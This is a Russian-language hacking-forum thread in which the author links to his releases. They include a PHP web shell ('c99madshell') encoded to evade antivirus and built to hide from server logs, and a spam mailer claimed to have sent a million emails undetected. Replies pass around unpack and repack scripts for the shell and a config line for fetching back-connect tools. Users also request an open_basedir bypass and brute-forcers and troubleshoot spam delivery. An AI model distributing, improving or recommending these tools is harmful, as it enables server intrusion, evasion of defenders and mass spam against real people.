Итак, прошу прощение за то, что в последнее время, вроде как, ничего нового от меня не поступало.
Наверстываю упущенное:

1) Список проксей
Наконец-то доработал скрипт сбора проксей.
Каждый час берет публичные прокси из 3х источников, проверяет валидность, скорость соединение, страну и т.д. Старые удаляет, а свежие сохраняет в БД, так что кому на быструю руку нужны соксы, милости прошу
http://madnet.name/tools/proxy/

2) VIDEO
Повышение прав, используя MySQL
Скорее я его писал для тренировки в обработке видео, но тем не менее.
Никак не могу выловить Zadoxik'а, поэтому надеюсь, он закинет видео отсюда
Качаем, смотри, наслаждаемся
http://madnet.name/files/3/14.html 1.7mb
Старенькое видео об xss в set-cms
http://madnet.name/files/3/13.html 2mb

3) с99madshell
Наверное, самый приятный релиз.
Какой шелл вы юзаете?
r57shell? потому что он гоняет все в посте?
Так ведь он очень неудобен, да и в последних версиях он все больше использует гет+баннеры+графика, в общем, ужас.
Из всего многообразия я для себя подобрал c99shell.
Что бы кто ни говорил он самый удобный, но есть много недочетов.

a) Картинки, запустите скрипт с включенной графикой в браузере, и вы подарили админу в лог минимум 100 строчек запросов.
b) Антивирусы, шеллы не должны палиться антивирусниками
c) Размер, 162кб для шелла, это согласитесь перебор.
d) GET, просто самый огромный недостаток, все данные посылаются method=GET

Итак, после некоторых мучений представляю полностью переделанный шелл.
a) Никакой лишней графики
b) Скрипт полностью переписан+тело закодировано, так что забудем про антивирусы
c) Удалено все лишнее+сжат, размер теперь 44кб сделал все что смог
в) Никакого GET, абсолютно все запросы гоняются методом POST, что позволит сделать наш шелл в системе слабо заметным.
Качаем отсюда
http://madnet.name/files/1/10.html

4) TextForVideo
Небольшая програмка для записи видео. Суть ее в следующем вы пишете в ней свой коментарий, а потом по нажатию горячей клавиши она вписывает коментарий в блокнот. Для того что-бы соответствовать событиям я сделал построчное разбиение, т.е, на каждой новой строке проги вы записываете фразу, которая должна быть выведена за раз.
К примеру:
Привет меня завут madnet сегодня я... ищем жертву.
Будем работать с www.xxx.xxx

Далее мы нажимаем на кнопку Запустить редактор
Будет загружен Блокнот с вашим именем в качестве заголовка, которое вы выберете в поле Заголовок редактора
Потом сворачиваем программу, она исчезает в трей.
Теперь можно начинать запись.
Все что остается сделать это нажимать на HotKey, которую вы установите в настройке, по умолчанию F9

Нажимаем ее в блокноте печатается надпись
Привет меня завут madnet сегодня я... ищем жертву.
Теперь вы делаете че там вам надо ищете и т.д., нашли жмем снова HOTKEY блокнот автоматов выносится на первый план и в нем появляется
Будем работать с www.xxx.xxx
Ну и так далее по тексту.
http://madnet.name/files/2/12.html

5) Mailer
Не подумайте что я спамер, просто был заказ написать спам скрипт.

Вот мой spam скрипт,
написан на php,
работает через sendmail

Возможности:
Интеллектуальная рандомная генерация полей
Рассылка с аттачем
plane и html тип
работа как с формами так и с файлами
и т.д.

Чел тестил на tut.by и yahoo.com
разослал по 1 000 000 писем.
Письма не были определены как спам.
http://madnet.name/files/1/3.html

Обо всех недочетах или пожеланиях пишем здесь, в ПМ или ICQ.

Надеюсь, хоть что-то полезное вы здесь нашли для себя.

С уважением madnet.

Мне понравился здесь список типов атак http://securityprobe.net/docs/2.html
Может выложить его на античате? Автор кто? Согласен?

Algol, выкладывай, только в качестве автора укажи пожалуйста http://securityprobe.net

Algol, выкладывай, только в качестве автора укажи пожалуйста http://securityprobe.net
Ок, только кое-что придется подредактировать, ибо я не со всем согласен в этой статье :)

madnet выложи гденить шелл в txt чтоб удобно юзать было. Типа как rst (http://rst.void.ru/download/r57shell.txt)

:) вот я за него сделал http://sec-hack.org/soft/madshell.txt

Специально для поклонников шелла Маднета!

С разрешения автора выкладываю два скрипта для распаковки\запаковки шелла, а также шелл в распакованном виде.

http://sec-123.narod.ru/shells/c99madnet/for_decript_c99.php
http://sec-123.narod.ru/shells/c99madnet/for_cript_c99.php
http://sec-123.narod.ru/shells/c99madnet/c99madshell_no_cript.zip

Теперь желающие смогут поправить его на свой вкус.
Например, изменить константу
$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
на свой сайт и грузить тулзы бэк-бинд-пайпа, которые не работают в оригинальном шелле.

Также, Вы можете изменить алгоритм шифрования, или изменить стандартные 11 сжатий на , скажем, 150 :)

Ах, вам не нравится шел Маднета? Вы уважаете шелл РСТ ?
Ну, чтож. Там принцип сжатия аналогичен, теперь вы сможете сконструировать свой рст-шел под себя, а затем распаковать и вырезать гадские счётчики! :)

madnet

Твой шелл рулез однозначно!!!

Может с нуля забабацаешь шелл так сказать свой запатентованый :)

madnet

Твой шелл рулез однозначно!!!

Может с нуля забабацаешь шелл так сказать свой запатентованый :)

нет в этом смысла, но возможно, если мне хватит сил и времени, вскоре появится что-то новенькое и интересное в этом направлении!

вскоре появится что-то новенькое и интересное в этом направлении!
ОК юэсей :) будем ждать а ждать мы умеем :)

Вот пользовал я год с99. и понял имхо что бэк коннект и бинд должны быть всегда внутри шелла. это очень часто спасает, а увеличивает скрипт на 3кб.
и ещё очень бы хотелось запихать туда возможность обхода open_basedir.

и вообще я лично не понимаю нах бекконнект убирать из скрипта?
чтоб юзер потом сам скачал, раскодировал, доделывал, кодировал,?

это бл.. игра какая то новая такая ?
под названием "после сборки обточить напильником"

чесслово .Маразм

Когда запускаю твою спамилку точнее просто открываею его на сайте вылазит во что
Cannot set time limit in safe mode in /home/global/domains/домен/public_html/files/madsp.php on line 8
Но прога роботает, пишет чьл разослано.

Когда запускаю твою спамилку точнее просто открываею его на сайте вылазит во что
Cannot set time limit in safe mode in /home/global/domains/домен/public_html/files/madsp.php on line 8
Но прога роботает, пишет чьл разослано.


Для того, что бы скрипт работал столько, сколько нужно, надо что бы на сервере был выключен Safe mode

У тебя тут очепятка:
http://madnet.name/tools/madss/

Заперщено к индексированию:
:)

а зеркала есть? +есть несколько идей насчет доработки шелла, отпишу попозже

Зеркал нет и пока не вижу никакой необходимости в них.

Не качаеться!
Что то с сайтом, или это только у меня так?

Доступ восстановлен.

мде... сейчас вот нужно было файлик один посмотреть, шелл залил, а посмотреть не смог, т.к. имя файла плюсенг содержит... это наверно с тех пор осталось, когда с99 с Гет запросами работал (ну всмысле менял плюсенг на %2b)... надо бы исправить

да и так недочеты есть, например файло сохраняет в туже папку где и шелл, а это имхо бывает критично, например залил я шелл через админку ну или еще как нить шелл залился а когда я его открываю, прав на запись (из шелла) в эту папку нет, а там еще и сейфмоде докучи... вобщем вот... а еще Sql клиент содержит недочеты

А в целом хорошо, сделано все через пост, картинок нет, которые нах ненужны были

вобщем если все доработать (ну там баги некторые устранить, тулзы типа бэкконект в шелл встроить, брутер опять же с обратными логинами сделать, можно еще и мускул брут сделать) хотя понимаю, что объять необъятное нельзя и всем неугодишь, буду только им пользоваться

Madnet

Спасибо за спам скрипт.
Действительно письма не определяются как спам. Но вот беда тип html не работает. До адресата доходить теги в открытом виде.

На досуге делаь было не чего )
Переделал диз мэйлера под диз а-чата (все копирайтенги соблюдены)

Вот пример:
http://kaitracid.awardspace.us/madsp.php

Сам скрипт:
http://slil.ru/25212510


Sadden, отлично шлется аштиэмэлом, все зависит от хоста с коорого ты шлешь.

Картинки глупо переносить расположение спамера можно спалить по логам...

Из спаммера скрипт уже давно вырос, теперь это "усовершенствованная отправка анонимной почты", не больше. А для кого это инструмент спама, могут удалить легко первую таблицу "шапку", останется "серый" ачатовский дизайн.

Здравствуйте, мне интересно этот php спамер тока у меня не отсылает на маил.ру или у всех? (на другие почтовики не пробовал)
P.S. тестировал как и на своих хостигнах, так здесь: http://kaitracid.awardspace.us/madsp.php

alexman90, http://kaitracid.awardspace.us/madsp.php - здесь он висит для демонстрации.

На мэйл ру прекрасно шлет, только с фри хостов врядли получится, большинство из них навно в блэк листе у мэйла.

К примеру с платного хоста jino все доходит, и в text и в html

Спасибо за информацию.... да странно что onepage.ru у них в блек листе....вроди как мало народу им пользуется...хотя это лучший из фрихостингов

AciD_FreaK А скачать его где можно. перечитал все с самого начала. Сползал на сайт а ссылки не нашел. Может не туда смотрю?

Так вот же он, переделанный

http://slil.ru/25212510
Оригинал в начале топа

имхо глюк в самом скрипте, потому что у меня есть другие скрипты которые шлют с бесплатного хоста и в хтмл

Шелл, определяет символические ссылки как обычные файлы